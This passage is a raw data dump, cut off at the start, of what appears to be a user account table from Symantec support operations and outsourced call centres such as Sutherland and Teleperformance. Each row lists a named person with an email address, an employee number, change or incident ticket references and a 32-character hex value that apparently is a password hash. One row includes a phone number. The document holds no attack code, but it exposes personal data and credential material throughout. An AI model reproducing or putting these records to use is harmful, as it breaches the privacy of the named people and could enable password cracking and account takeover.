k>,a0b8269cae1e1c42eab7dfeb455a2430,Reddy,<blank>,111962,Srinivas,NULL,NULL,NULL
bbe8-4e1c-8c0f-32650b8473b9,<blank>,<blank>,joel_joseph2@symantec.com,<blank>,9b
f2c8cdd2f7048a385286caf15d8a76,Joseph,<blank>,111971,Joel,NULL,NULL,NULL
7319-4e39-81ed-00b2aa3b0e61,CRQ000000071050,hvk 14 May 10,giles_storrie@symantec
.com,Symantec,709f0607373b1e1e6f4a208cfb3facb2,Storrie,<blank>,032533,Giles,NULL
,NULL,NULL
d608-4b3d-989f-e8cd86e56dc8,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,a
4adaee1e7ed878c450900cda0725d02,Tan Chavarria,<blank>,111101,Yani Jesamine,NULL,
NULL,NULL
d7c3-4cb4-ae5c-a4b608514665,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,36236ff1c07f27ef2823dac552d2f017,Daguinotanlwag,<blank>,100682,
KatherineClaire,NULL,NULL,NULL
07e0-4a25-bd40-949aa4f55f18,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
2727edd7c6d739d8f1b29d5d80dcb11,karthikeyan,<blank>,108873,Preethi,NULL,NULL,NUL
L
d5b1-4274-994a-39bccb9ae11a,Hvk 3 MArch 10,EMPROV,tools_id@symantec.suth.com,Sut
herland,9ef4cbb62c444dedf45972dd90ba26db,Lucena,<blank>,100550,Joven Subingsubin
g,NULL,NULL,NULL
27ad-44dc-bd6d-5d21ae4badaa,bpr-02-06-10,EMPROV/INC184885,tools_id@symantec.suth
.com,Sutherlands,9bf7dd92074371636b5192199f95aad2,Rajiv,<blank>,104711,Gnanaprak
asam,NULL,NULL,NULL
ccf5-4378-bf7d-8b9982ed8b8e,<blank>,<blank>,louis_nassetta@symantec.com,Symantec
,08e3e9ddfeb1832ae2dd6957ccac757c,Nassetta,<blank>,louis_nassetta,Louis,NULL,NUL
L,NULL
f87d-4295-a179-6e7eb0be1204,CRQ000000208088-vmd-25/02/11,000-000,tools_id@symant
ec.suth.com,Sutherland,8fe4a134efbdcbb54e62ac1f15bd0efc,Prasanna,<blank>,113354,
Vasavi,NULL,NULL,NULL
86a1-498c-9b64-90e5587450e9,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,9
14c6a880e8487302d5ae27e11d6f6d1,Kinattukaravalappil Madhavan,<blank>,111707,Kris
hnaprasad,NULL,NULL,NULL
17e9-4d30-aad7-0dcbe04b9db3,<blank>,<blank>,lily_li@symantec.com,CLTS,0e64f16ca6
b15ed507db14edab8ac1c8,Li,<blank>,lily_li,Lily,NULL,NULL,NULL
6424-4d8a-a519-57ec2a6700e0,<blank>,<blank>,mark_truitt@symantec.com,Symantec,5f
e3d82cbd3e2eefd530b1c2c1a08e7c,Truitt,<blank>,mark_truitt,Mark,NULL,NULL,NULL
b817-40ac-a7cb-de6109c03a8e,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,024a37468eb4d625929b81febc8e6c15,Abel Alejandro ,<blank>,109422,Iustina ,
NULL,NULL,NULL
540c-4fe6-a88a-eafc2661f124,<blank>,<blank>,sudhindra_b_v@symantec.com,<blank>,e
6dc9c8d9abc5da30e84c4c26e460fff,B. V,<blank>,109168,Sudhindra,NULL,NULL,NULL
147b-47fa-afd6-40728edd8e4f,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,9
d16bf5e49dd3b97e0b7cb65d37a64c7,Santos Espa\xf1ol,<blank>,111103,Athens Vienna,N
ULL,NULL,NULL
cfae-4ca9-bc3b-db95f8fea829,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,raymondlomuntad_tobi@symantec.com,CRQ000000247184 - PR - 4/28/2011,fab4515cc
e95094d2bebccbcd8826319,Tobias,<blank>,114736,Raymond Lomuntad,NULL,NULL,NULL
5b1e-4a12-9edf-320e22cf8624,CRQ000000227546-KD-28-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,94fc5228c0640e41e8e1ed9c4c1eac27,Dulipalla,<blank>,11420
4,Sudhir,NULL,NULL,NULL
832f-4403-b1da-edaec40b9eb3,CRQ000000208167-vmd-25-02-11,000-000,tools_id@symant
ec.suth.com,Sutherland,5948489a9c32ef7ef90c08c0c605c613,Chelluri,<blank>,113369,
Sesi,NULL,NULL,NULL
0d24-413f-82f2-262f92740897,<blank>,<blank>,alex_anderson@symantec.com,Symantec,
d14ae2a54631d761b295801af427f055,Anderson,<blank>,alex_anderson,Alex,NULL,NULL,N
ULL
2582-46aa-8366-11f32b6326e0,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,29c9ffc64dc782bbf426b6774e310664,R,<blank>,091729,Sivakumar,NULL,NULL
,NULL
77dc-47ea-adce-f77483fa7d4a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,515d148063c2b6de354dcc5e8bb8d00f,Jagannath,<blank>,088273,DineshKumar,NULL,NULL
,NULL
26dd-421c-9038-2544f503d46e,28/01/2010-SPJ,EMPROV,Tools_Id@Symantec.Suth.com,Sut
herland,03ebbb24995759a37c09247f6e8145df,PS,<blank>,093480,Arjun,NULL,NULL,NULL
0abf-45eb-947d-273d2d6b46c3,nam-08-17-2010,CRQ000000110179,tools_id@symantec.sut
h.com,Sutherland,3b382d73bb322f2a16d6149ea0f366d3,ShankarR,<blank>,106536,Gowri,
NULL,NULL,NULL
fb37-4e15-916f-866d7c0032e6,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,e5e83a1cc58f44a83c2410de81799235,Reddy Gunna,<blank>,091742,Sri
kanth,NULL,NULL,NULL
cca6-4175-aece-7e0edf6fbeeb,CRQ000000515606 SP Jan 20 2012,000-0000,sumanbabu_je
lli@symantec.suth.com,Sutherland,67148bfda2374b1c6c6966f37f4f3629,Jelli,<blank>,
124156,Suman Babu,NULL,NULL,NULL
0ab1-4dae-85d6-99e63fafd5ff,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518342,399e5f55c2252ebc1e32cecbd3bccce7,Digno,<blank>,124168,Mary
Grace ,NULL,NULL,NULL
4353-42e4-b1f2-17e86e4ae073,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518191,45096493800cf29bad42cdbb8a189dc8,Ilagan,<blank>,124185,Mel
ba,NULL,NULL,NULL
333f-44b2-892e-3bd0d03f7eb1,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,a656012b624e079e33d5540995610b35,Sayyed,<blank>,10457
5,Rafique,NULL,NULL,NULL
1466-462a-91b3-d1a124033973,13/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,8c4ae12f4d187a54ddf3f7fc65c13672,Chandra,<blank>,105256,Dara,NULL,NULL
,NULL
2c7b-4637-b0b6-3419761209e7,sp-10/1/2011,<blank>,tools_id@symantec.suth.co,<blan
k>,576cff1c3a11cd237b6e67134559a154,George,<blank>,111945,Arun,NULL,NULL,NULL
ff23-4e6e-930c-71f4e9267be4,CRQ000000518278 SP 24 Jan 2012,000-0000,mehaboob_sha
ikjani_c@symantec.suth.com,Sutherland,90c46b4dc0d2abafe841a22b395222e7,ShaikJani
,<blank>,099379,Mehaboob,NULL,NULL,NULL
0859-4250-9f0c-cbb9e45bf6b3,vmd-12/11/2011,<blank>,Gabriel_Wilson@symantec.com,S
YMC,b1623fd559197c309361a65353206a80,Wilson,<blank>,096120,Gabriel,NULL,NULL,NUL
L
9001-46c0-919c-47a6b2d424ae,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,e9fcc9e501b08a179b1eb92406da1665,Herrera,<blank>,portia_herrera_cc,Portia
,NULL,NULL,NULL
ff14-43a9-a422-10f26a956725,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,b13a7b4469a0bbdb6784988cd22f7ff7,Abdul Kafoor,<blank>,086255,Muhsin,NULL,
NULL,NULL
66a4-46dd-b412-29e2a7eb16e3,sms 29,nam 07/15/2010,tools_id@symantec.suth.com,Sut
herland,a8c9807a713c038e8911880798129df2,VVR,<blank>,093007,Rahavendar,NULL,NULL
,NULL
0df2-4594-b7e7-7fac9817c605,<blank>,<blank>,symantec_2nd_maa@tp-tec.nl,Teleperfo
rmance,3b50a992bbe11729b7c213933278b1fd,Schultze,<blank>,110303,Robert,NULL,NULL
,NULL
4e21-4985-b52c-131b1870f5b9,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,a9f71993e9ce82eae5a4a51a701ba121,Salian,<blank>,093008,Sudha,NULL,NUL
L,NULL
8852-4ca6-a234-9d8d4bbcb0c0,28/01/2010-SPJ,EMPROV,Tools_Id@Symantec.Suth.com,Sut
herland,c270fff11840d4f94d30a8fb9fa0f5e1,Subhash,<blank>,098917,Pandiyan,NULL,NU
LL,NULL
d992-455e-bff8-2d60387fd905,<blank>,<blank>,christian_espiritu@symantec.com,Syma
ntec,de60edd9d1afe8dd0b4ab6934928c813,Espiritu,<blank>,christian_espiritu,Christ
ian,NULL,NULL,NULL
15eb-4b3a-ac51-d9ab492e8c71,CRQ000000346770-CLNP-28/09/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,91442434978d47f889e9e435abf17b2d,M,<blank>,120912,Alw
yno Martin,NULL,NULL,NULL
69aa-4b13-9e03-bcf33eaca3c1,CRQ000000245739 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,fa40951c6476203146cb447511e5aa12,Vora,<blank>,115167,Ra
jesh,NULL,NULL,NULL
82ca-4c71-8207-4bab492887b6,<blank>,541-335-5597,rick_vaughan@symantec.com,Syman
tec,252ee80879085681f9503c2a2176445e,Vaughan,<blank>,rick_vaughan,Rick,NULL,NULL
,NULL
220a-4576-9524-cc57a3438d12,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,brazzyquevedo_maniev@symantec.com,CRQ000000247164 - PR - 4/28/2011,52ca7dd9d
d9d138a025afe4e6980bbbf,Manievo,<blank>,114733,Brazzy Quevedo,NULL,NULL,NULL
6a91-491c-b24d-72e5def9fd55,hvk-2-06-10,INC185230,Sandra_Gicquel@symantec.com,sy
mantec,7a1dc47965c9ee22a332d4b4ac5df288,Gicquel,<blank>,045102,Sandra,NULL,NULL,
NULL
9f47-4432-b73a-88c6b1b5a63b,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,2516511de2fb1ce801896c192b979d78,Thakkar,<blank>,11
4192,Jugal,NULL,NULL,NULL
bebe-44b2-9920-0a80f080fa58,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,de4f637fcec73228b359dd79a5d9d3a3,Saberon,<blank>,093241,Kimbb Rose,NU
LL,NULL,NULL
f4ef-469a-a4f5-c61f5366a9b9,CRQ000000349498-CLNP-04/10/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,3629f0d03c8e192d341292174483aa6d,Ansari,<blank>,07387
5,Anas,NULL,NULL,NULL
1bd0-4928-bf9f-fdad12cbdbcb,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8908becac23b8cd9b5958e27e2ebdb6a,Raut,<blank>,086310,Chirag,NULL,NULL,NUL
L
404b-4297-ac43-c8c25aeb5675,sms 29,EMPROV,Tools_ID@Symantec.Suth.Com,Sutherland,
3bcfa4f0699af1a8f9279a5d84d2f781,Shaikh,<blank>,105140,Mohsin,NULL,NULL,NULL
6304-4ec4-87d8-51a1c5e41293,CRQ000000461244 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,7196b37947aeb46dd5b4beae34a81ff0,Medrano,<blank>,12324
4,Elinor Agasino,NULL,NULL,NULL
0bfa-4424-958b-ddd830936a2c,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464899,7e9381568797f2196711aed349244fe2,Baltazar,<blank>,123250,Sh
iela Beltran,NULL,NULL,NULL
7f1c-4e75-8985-6ca49e047799,CRQ000000217032-KD-16-03-2011,000-0000,AshokKumar_M@
symantec.com,Symantec,ca4e98a4a4027a7b5106ea2ab21950a0,M,<blank>,113682,Ashok Ku
mar,NULL,NULL,NULL
6799-417b-9db8-8db333735b9c,<blank>,<blank>,tools_id@symantec.suth.com,CKS-10/05
/2010,dadb8fd1d2798a379eb9400cabcee01b,Barla,<blank>,109326,Prasanth,NULL,NULL,N
ULL
6650-4325-b79c-a26f39873033,VB= 05/10/2010,<blank>,tools_id@symantec.suth.com,<b
lank>,8980af4a6bb383d72545e92a3d32be03,P,<blank>,109146,Sunil ,NULL,NULL,NULL
af3d-4fa5-8048-acc835935bc1,CRQ000000220182-KD-16-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,bb9df438fce4c81857d3b693743b2a5c,Subramanian,<blank>,101
073,Swadeep,NULL,NULL,NULL
f34f-4f31-ae17-1e8ba5fcaec9,CRQ000000221839 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,bd1ac60817e6cab35a1109837d9245cc,Mukundan,<blank>,11401
4,Jayakrishnan,NULL,NULL,NULL
1d99-40c6-9573-582769fd8465,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464935,f5c5a361e52335f1f6dc0131152f53b1,Sayson,<blank>,123263,Jeff
erson Chris Bella,NULL,NULL,NULL
b867-4a8f-96c3-8dd950229f7d,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,58fb0af5dc38dc0c19f721c84aeb7226,Chandran,<blank>,093353,Soumya,NULL,
NULL,NULL
2933-4880-8e68-89b8a0f988e8,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c5b66a96f57615956a258af2d824f2bc,K,<blank>,099777,Susila,NULL,NULL,NULL
e339-4f3f-be84-c29bb4108809,CRQ000000221233,<blank>,tools_id@symantec.suth.com,K
SC-03/18/2011,0c4f55e08d1d859787e688fe501e6949,Venkata,<blank>,113863,Srikanth,N
ULL,NULL,NULL
34e6-43b8-a2b2-4b24f553834e,CRQ000000221247,<blank>,tools_id@symantec.suth.com,K
SC-03/18/2011,5ac3bf94565ebb348eb85bac0d4b8198,Kumar,<blank>,113865,Sudheer,NULL
,NULL,NULL
c100-453e-aaaf-3a3c2c08537c,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,16f7cd715810a93b57986d296854f3dc,Balaoro,<blank>,110068,Mariaalyson,NULL,NU
LL,NULL
b0db-4ec4-8f52-57cc899420d7,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,4e9206bc9deb637193034ed5f9a34972,MohamedK,<blank>,093009,Shaik,NULL,N
ULL,NULL
a2d9-4203-81b8-0cf7976baab2,nam-08-09-2010,INC000000238017,tools_id@symantec.sut
h.com,Sutherland,c9e15cf56cfb0e979d97d05d3b4539a7,Raju,<blank>,105797,Denish ,NU
LL,NULL,NULL
2b5d-4dd1-904a-3a291687e32c,SRB 12.08.2010,INC000000241142,Tools_Id@Symantec.Sut
h.Com,Sutherland,53fb10845ce96f58258e340e6bc46911,Katta_c,<blank>,099049,Pravall
ika,NULL,NULL,NULL
3a3f-4e1c-a42d-c854f0d09342,03/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,9fa3f7353d5eef1539440e12684061f7,NivasL_cc,<blank>,098983,Sandhya,NULL
,NULL,NULL
fef8-4c0c-86c2-40796dc9aaeb,24/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,ba4ad3d7d42c10d10ee15313ac900e82,FernandezEncinares,<blank>,105483,Lan
ce,NULL,NULL,NULL
7b18-4409-a850-d6d43dbabb6f,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,668d9195283ebfbbcd92e5a5ea1e0704,Ahamed,<blank>,093002,Fayyas,NULL,NU
LL,NULL
cd4e-4067-9f6f-a05eb97dc29d,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,too
ls_id@symantec.suth.com,9bd09fb845552e80f9bc4faf7e39b9f3,Reyes,<blank>,110049,Al
drin,NULL,NULL,NULL
f2c0-4255-a330-dc898f2a4474,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,6733c22369540f768bb1a802da12f082,DeRamos,<blank>,110055,Cristina,NULL,NULL,
NULL
9054-407b-af53-a2ac8f228c4b,sms 05.10.20.10,<blank>,tools_id@symantec.suth.com,S
utherland,f1f336f853e70741361d7c5c0c8cee33,William,<blank>,109189,Robinson,NULL,
NULL,NULL
f92b-4fe3-b7e2-beb59a6c4b9f,SMS 05.10.2010,<blank>,tools_id@symantec.suth.com,Su
therland,c694b0246457347a99bc50b5664d1d76,Elangovan,<blank>,109191,Karthick,NULL
,NULL,NULL
3e9a-4df6-84b0-259c3e71e1e9,VB- 05/10/2010,<blank>,tools_id@symantec.suth.com,<b
lank>,b2bc4715a5eb0aceb0b4679ccfb31f7a,Vemana,<blank>,109382,HariKrishna,NULL,NU
LL,NULL
b8c6-4ce3-9d50-7094add7943e,PM - 6/23/2011 - CRQ000000285621,<blank>,tools_id@sy
mantec.suth.com,<blank>,c4e110ac5b878f405c71d1d4ea97258c,T,<blank>,117611,Rakesh
,NULL,NULL,NULL
17c8-46a9-9123-4a3f4dc6c10b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,13a8c8c3c7823be5fe348c17caf8440b,CP,<blank>,096263,Nikhil,NULL,NULL,NULL
8316-45e0-94b6-9ea1aff80c20,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,12fd5bd7b51ee72bbeaa4e38ebe5d993,Lenessa De Real,<blank>,075126,Ma,NU
LL,NULL,NULL
7eb4-4058-8346-13cc66e10fb3,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,7b46af3dfc37c6fd3f9b03105818d39b,Madathinkal Karunakaran,<blank>,0751
49,Sabeesh,NULL,NULL,NULL
3403-4fff-848e-872c410904f9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,166274f235b08684d211c8ed9f6ed220,Kumar,<blank>,096259,Sanath ,NULL,NULL,NULL
d010-4364-b8ba-2373c973b6e6,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,77349fa1c1d78e35d9df9bd289343ee6,Konada,<blank>,099047,Venkatesh,NULL,NULL,NUL
L
ddb6-4eeb-93cd-4476137b9c82,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c7e9c6faa3978438c127c7a65854d855,Ibero,<blank>,086840,Kenneth Gatuslao,NU
LL,NULL,NULL
22c5-4d5f-bbe4-1951472ff8b7,sms 05.10.2010,<blank>,tools_id@symantec.suth.com,Su
therland,e62302a7f57c04c2963c86256629974d,Neelavannan,<blank>,109193,Jayaprakash
,NULL,NULL,NULL
e62f-443b-b7fc-91d44a6ec9e2,sms 05.10.2010,<blank>,tools_id@symantec.suth.com,Su
therland,1699001869035441c3e7728f37d6a91d,Ayyadurai,<blank>,109216,Shruthi,NULL,
NULL,NULL
cc5f-46da-9da0-f93bada69330,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,78a0f378156b9506b45f39655e971719,Mahinog,<blank>,093237,Daryle Ann,NU
LL,NULL,NULL
34a4-489f-a982-2e3a80ed087e,<blank>,<blank>,bobbi_shurtliff@symantec.com,Symante
c,d714c729252b938a200f73ff5946319b,Shurtliff,<blank>,bobbi_shurtliff,Bobbi,NULL,
NULL,NULL
ac03-42d7-b0db-295dcfc092b7,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6775d1a51942db96628cd976bfe586d3,P,<blank>,096255,Dileep ,NULL,NULL,NULL
3e4a-413c-b51b-b3c41ca2d724,CRQ000000245616 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,3797675b4dd0b61c6395a38b84c6e538,B,<blank>,115150,Qadir
Alam,NULL,NULL,NULL
856d-4bd7-bc15-a94818859a05,CRQ000000245622 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,35081a456987be9bfdb010279dbc495b,SA,<blank>,115151,Chan
drasekaran,NULL,NULL,NULL
6514-467f-9406-f4d6587b5648,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,baa3cde38210c0728590516ae3da599a,M,<blank>,096260,Maneesh ,NULL,NULL,NULL
28d2-4253-a5a6-02701b9193c8,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,49a6ea5020c05681ef982a2e9f9a1f5d,Manukonda,<blank>,093254,Keerthi,NUL
L,NULL,NULL
9bfc-4ebe-880c-588146245ddd,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,michaelhectormanliga@symantec.com,CRQ000000247179 - PR - 4/28/2011,18b01a185
4c4763ff8bf0ea8041cfb47,Banawa,<blank>,114722,Michael Hector Manligas ,NULL,NULL
,NULL
6824-4dca-9d40-099336572199,CRQ000000247853,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,8f00482d4da3edeb2b68ea566f0581d9,Romano,<blank>,115584,IlliRome,NU
LL,NULL,NULL
29c9-4724-a77f-06b0e9a2a883,PR 30/12/10,<blank>,nh.symantec@teleperformance.com.
ar,<blank>,b535fec4e2d0b76f522ef670508b4844,Signorelli,<blank>,111862,Jesica,NUL
L,NULL,NULL
e4a4-49d9-a65d-378d38102e3e,19/04/2010 - SPJ,INC000000155088,antec@teleperforman
ce.com.ar,Teleperformance,7bb57e762104a65a81fddd3ac6856a26,Cardoba,<blank>,09922
9,Gonzalo,NULL,NULL,NULL
d650-4f7a-9544-a3d01e75728d,nam-08-19-2010,CRQ000000110944,tools_id@symantec.sut
h.com,Sutherland,417878f809dd8a17f87edef3541fa5d7,Viswanathan,<blank>,108186,Anu
sha,NULL,NULL,NULL
ea7f-49a6-bfef-e27219492419,12/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,1a5b17856e563668d112d35631994769,PurandharanNair,<blank>,099473,Murali
Krishnan,NULL,NULL,NULL
8a54-4712-af6a-94170a9044e2,SRB 28.06.2010,INC000000203799,symantec_2nd_maa@tp-t
ec.nl,TPH,08c1394863419ab0d134373fe34b3e99,vader,<blank>,072913,martijn,NULL,NUL
L,NULL
735c-401a-b0bc-130d390264b2,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,899e5f9ed278e747f04002e78b9c7e26,Prasanth,<blank>,075768,Praveen,
NULL,NULL,NULL
96b2-4cd2-80e4-6468253e30ae,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,d2eb510fef4ca96f376b874a874b7dd7,Bindu,<blank>,092157,Hima,NULL,NULL,NULL
6e87-4113-ba97-39407eadcb4c,nam-08-09-2010,INC000000238017,tools_id@symantec.sut
h.com,Sutherland,cd629d4aafc817a90e7c23807c9429ca,Janardhanan,<blank>,105227,Sre
ejith,NULL,NULL,NULL
9d29-40fc-b3c1-f89e0bf0cb4a,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,50384b7622776dc70548d8919278c932,Moses,<blank>,075655,Ri
chard,NULL,NULL,NULL
440b-4779-8b94-fea721a93a02,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,0a1e6df4a10436c044b7001aa50be090,Jaya Krishnan,<blank>,0
75581,Rathna Kumar,NULL,NULL,NULL
ef9e-47b8-9d22-2c40c135cfca,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,f49bab06b6ab0e5625b1142b4d935198,M,<blank>,074581,Prasanth Kumar,NULL,NUL
L,NULL
f377-452c-a7eb-c351607b1921,sms 11.11.10,<blank>,tools_id@symantec.suth.com,suth
erland,9ecdb61ca13dc249c4d58c4b5649f8d0,Mehta,<blank>,110565,Nirav,NULL,NULL,NUL
L
17a6-4603-b4ba-91b1c7aab873,PM - 5/20/2011 - CRQ000000261257,<blank>,tools_id@sy
mantec.suth.com,<blank>,a9468217d9f48d4204437053113ddee7,Kondeti,<blank>,115839,
Sirisha,NULL,NULL,NULL
9719-4f41-8d30-3eca0556ed78,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,61ad2d87fad631316850ebf76a381da8,Abastillas,<blank>,086852,Cheresha Ann L
umapas,NULL,NULL,NULL
ded9-4421-a962-b129c5e31a57,13/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,663094069ea64d2586e4cc835ffe151a,PV,<blank>,105259,Kishore,NULL,NULL,N
ULL
c966-4ada-a9c8-5da87c66b495,INC233730,nam-03-08-2010,tools_id@symantec.suth.com,
Sutherland,4a0f9b12a5ed7e5ac819bb05ea8c239b,Mosqueda,<blank>,085794,Lindsley,NUL
L,NULL,NULL
7125-47a0-a827-48e8b87e0e30,27/05/2010 - SPJ,EMPROV,Mangesh_Pohekar@Symantec.Sut
h.Com,Symantec,797229b18d876ed0a203c825d15fbfa0,Savade,<blank>,105552,Chetan,NUL
L,NULL,NULL
1c41-49be-9520-6d77c2744a42,SRB 23.06.2010,INC200950,tools_id@symantec.suth.com,
Sutherland,03b14040ad2e408a2d2244d0222fbcfc,Aseervadam,<blank>,098463,Amalraj,NU
LL,NULL,NULL
165b-4a4f-8ea0-9fd565288bd0,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,040f5370bbc23b0c15c14f581012ea5c,Alagesan,<blank>,074604,Senthil,NULL,NUL
L,NULL
52b2-4721-9b3f-643025999d09,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,0aa52c5c7edd670719e753d7cd864912,Raj,<blank>,074521,Anoop,NULL,NULL,NULL
f8ba-49bd-a48b-d5ed30d49ca3,nam-08-17-2010,CRQ000000110102,tools_id@symantec.sut
h.com,Sutherland,2c5a4829a1fdda6846cbe509cac74bf8,Naidu,<blank>,106565,Sharada,N
ULL,NULL,NULL
ca0d-428e-89df-6b981f62c5d6,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,a920ed84cca08c5166d294d6829814f2,Varghese,<blank>,094408,Ria,NULL,NUL
L,NULL
638a-4931-9721-ae088babbfb8,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,727762de7b63f4812b91cd819cf3fefc,Olitoquit,<blank>,100207,Christian,NU
LL,NULL,NULL
d1eb-4ab0-b8e2-2b93a93313a4,hvk4March10,EMPROV,Tools_id@symantec.suth.com,Suther
land,3489e6bdc600833ee5675feef80b4be7,Aliben,<blank>,100240,Marygrace,NULL,NULL,
NULL
382b-44fd-a4c8-5418bc3349a2,MI - 10/04/2010,<blank>,tools_id@symantec.suth.com,S
utherland,08d943c5a541cf387de956758bdbac88,Caceres,<blank>,109100,Ronn Verone,NU
LL,NULL,NULL
7c4c-4cac-be91-d908a917d467,<blank>,<blank>,tools_id@symantec.suth.com,RM-24-08-
2011-CRQ000000326178,751b895eb839180f4cd74fb918c7fab6,K,<blank>,119869,Lakshmi,N
ULL,NULL,NULL
c87c-4eff-9a1b-7b2637a25194,<blank>,<blank>,snehal_gamaji@symantec.com,<blank>,4
d70cfeaffe02e1970c6265bf5195308,Gamaji,<blank>,snehal_gamaji,Snehal,NULL,NULL,NU
LL
b91c-4bec-8e3c-eb8faa9611e2,WS 26-07-2010,INC000000225859,Tools_Id@Symantec.Suth
.Com,Sutherland,cd344e26509b5654669ea1c65e799181,Dizon,<blank>,100383,DinoMarcoD
avid,NULL,NULL,NULL
b76f-45ec-b54c-40449a2098a5,CRQ000000199906,<blank>,accounts@symantec.teleperfor
mance.gr,KSC- FEB10TH,598a7764e2d36a21fb6e0570f13bed2e,Mehilli,<blank>,067004,Ge
ntiana,NULL,NULL,NULL
819e-4d1f-a789-43376b115fac,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,0f7b9dd2d7bc2401aad11ddae03c4b7d,Kumar PR,<blank>,093591,Vijay,NULL,N
ULL,NULL
b380-4ae7-8556-7b44f6011665,CRQ000000204567 - PR - 2/18/2011,<blank>,Praveenjoyf
ernando_R@symantec.com,<blank>,25d23b95d22eabf91aa33760640b544f,Jai,<blank>,1130
34,Praveen,NULL,NULL,NULL
ff5f-45b2-81e4-1ab7ecae48b3,CRQ000000204567 - PR - 2/18/2011,<blank>,Rajagopal_G
@symantec.com,<blank>,800e362adec2599cc9532b586d5f6b32,G,<blank>,112026,Rajagopa
l,NULL,NULL,NULL
f55f-4f39-ac82-441a2f4d085b,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,5fc702805db3c39e01c95c2b57503c91,Vaidyanathan,<blank>,094132,Vigneash
waran,NULL,NULL,NULL
7130-4e6a-aca6-26aed905b83d,PBP 24/02/2011 CRQ000000207783,<blank>,tools_id@syma
ntec.suth.com,Sutherland,2cc3a587e5193bcc104569be2f5f5a56,Ranjan,<blank>,113322,
Bignesh,NULL,NULL,NULL
4922-4903-81c7-252aab74dbf1,PBP 24/02/2011 CRQ000000207787,<blank>,tools_id@syma
ntec.suth.com,Sutherland,c42660b4946a181f307469bc1a009ce6,Das,<blank>,113323,Cha
mpak,NULL,NULL,NULL
8f10-453a-8ff4-980730fc822b,AY 22.07.10,INC000000223412,tools_id@symantec.suth.c
om,<blank>,0b8a39da897be04a87a45a873a5761da,Chennagiri,<blank>,074620,Gopikrrish
na,NULL,NULL,NULL
f2cf-46cb-92a9-04a875553f8d,hvk4March10,EMPROV,Tools_id@symantec.suth.com,Suther
land,90372c28ca98f893ac2d7a2880f747b8,Bungay,<blank>,100435,OlandlanCaluya,NULL,
NULL,NULL
